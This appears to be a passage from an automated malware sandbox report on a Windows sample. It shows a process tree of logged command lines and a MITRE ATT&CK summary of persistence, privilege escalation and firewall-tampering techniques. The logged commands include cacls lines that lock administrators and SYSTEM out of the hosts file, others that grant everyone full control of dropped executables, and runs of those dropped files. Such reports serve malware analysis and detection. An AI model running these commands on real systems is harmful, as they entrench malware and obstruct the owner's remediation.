    PID 1868  C:\Windows\SysWOW64\cmd.exe
      cmdline: C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    PID 1400  C:\Windows\SysWOW64\cacls.exe
      cmdline: cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators
    PID 5440  C:\Windows\SysWOW64\cmd.exe
      cmdline: C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    PID 5448  C:\Windows\SysWOW64\cacls.exe
      cmdline: cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM
  PID 6536  C:\Windows\TEMP\tdtbtjeet\gbvdtzbdv.exe
    cmdline: C:\Windows\TEMP\tdtbtjeet\gbvdtzbdv.exe -accepteula -mp 2576 C:\Windows\TEMP\tdtbtjeet\2576.dmp
    - Executes dropped EXE
    - Modifies data under HKEY_USERS
    - Suspicious use of AdjustPrivilegeToken
  PID 5944  C:\Windows\TEMP\tdtbtjeet\gbvdtzbdv.exe
    cmdline: C:\Windows\TEMP\tdtbtjeet\gbvdtzbdv.exe -accepteula -mp 3032 C:\Windows\TEMP\tdtbtjeet\3032.dmp
    - Executes dropped EXE
    - Modifies data under HKEY_USERS
    - Suspicious use of AdjustPrivilegeToken
  PID 5224  C:\Windows\TEMP\tdtbtjeet\gbvdtzbdv.exe
    cmdline: C:\Windows\TEMP\tdtbtjeet\gbvdtzbdv.exe -accepteula -mp 1620 C:\Windows\TEMP\tdtbtjeet\1620.dmp
    - Executes dropped EXE
    - Modifies data under HKEY_USERS
    - Suspicious use of AdjustPrivilegeToken
  PID 6796  C:\Windows\TEMP\tdtbtjeet\gbvdtzbdv.exe
    cmdline: C:\Windows\TEMP\tdtbtjeet\gbvdtzbdv.exe -accepteula -mp 4832 C:\Windows\TEMP\tdtbtjeet\4832.dmp
    - Executes dropped EXE
    - Modifies data under HKEY_USERS
    - Suspicious use of AdjustPrivilegeToken
  PID 6668  C:\Windows\TEMP\tdtbtjeet\gbvdtzbdv.exe
    cmdline: C:\Windows\TEMP\tdtbtjeet\gbvdtzbdv.exe -accepteula -mp 4844 C:\Windows\TEMP\tdtbtjeet\4844.dmp
    - Executes dropped EXE
    - Modifies data under HKEY_USERS
    - Suspicious use of AdjustPrivilegeToken
PID 2748  C:\Windows\SysWOW64\nspfoo.exe
  cmdline: C:\Windows\SysWOW64\nspfoo.exe
  - Executes dropped EXE
  - Suspicious use of SetWindowsHookEx
PID 4356  C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=3644 --field-trial-handle=2260,i,3739451884007376837,4900555371550671478,262144 --variations-seed-version /prefetch:8
PID 1964  C:\Windows\system32\cmd.EXE
  cmdline: C:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\lbbdqheb\suahuuu.exe /p everyone:F
  PID 3420  C:\Windows\system32\cmd.exe
    cmdline: C:\Windows\system32\cmd.exe /S /D /c" echo Y"
  PID 1656  C:\Windows\system32\cacls.exe
    cmdline: cacls C:\Windows\lbbdqheb\suahuuu.exe /p everyone:F
PID 748  C:\Windows\system32\cmd.EXE
  cmdline: C:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\TEMP\vleitjdvn\bgjnyg.exe /p everyone:F
  PID 2652  C:\Windows\system32\cmd.exe
    cmdline: C:\Windows\system32\cmd.exe /S /D /c" echo Y"
  PID 2960  C:\Windows\system32\cacls.exe
    cmdline: cacls C:\Windows\TEMP\vleitjdvn\bgjnyg.exe /p everyone:F
PID 3712  C:\Windows\system32\cmd.EXE
  cmdline: C:\Windows\system32\cmd.EXE /c C:\Windows\ime\suahuuu.exe
  PID 4856  C:\Windows\ime\suahuuu.exe
    cmdline: C:\Windows\ime\suahuuu.exe
    - Executes dropped EXE
    - Suspicious use of SetWindowsHookEx
PID 6232  C:\Windows\system32\cmd.EXE
  cmdline: C:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\lbbdqheb\suahuuu.exe /p everyone:F
  PID 6092  C:\Windows\system32\cmd.exe
    cmdline: C:\Windows\system32\cmd.exe /S /D /c" echo Y"
  PID 5924  C:\Windows\system32\cacls.exe
    cmdline: cacls C:\Windows\lbbdqheb\suahuuu.exe /p everyone:F
PID 6244  C:\Windows\system32\cmd.EXE
  cmdline: C:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\TEMP\vleitjdvn\bgjnyg.exe /p everyone:F
  PID 6176  C:\Windows\system32\cmd.exe
    cmdline: C:\Windows\system32\cmd.exe /S /D /c" echo Y"
  PID 6008  C:\Windows\system32\cacls.exe
    cmdline: cacls C:\Windows\TEMP\vleitjdvn\bgjnyg.exe /p everyone:F
PID 6040  C:\Windows\system32\cmd.EXE
  cmdline: C:\Windows\system32\cmd.EXE /c C:\Windows\ime\suahuuu.exe
  PID 5936  C:\Windows\ime\suahuuu.exe
    cmdline: C:\Windows\ime\suahuuu.exe
    - Executes dropped EXE
    - Suspicious use of SetWindowsHookEx
Network
MITRE ATT&CK Enterprise v15
Persistence
- Boot or Logon Autostart Execution (1): Registry Run Keys / Startup Folder (1)
- Create or Modify System Process (1): Windows Service (1)
- Scheduled Task/Job (1)
Privilege Escalation
- Boot or Logon Autostart Execution (1): Registry Run Keys / Startup Folder (1)
- Create or Modify System Process (1): Windows Service (1)
- Scheduled Task/Job (1)
Defense Evasion
- Impair Defenses (1): Disable or Modify System Firewall (1)
- Modify Registry (1)
Downloads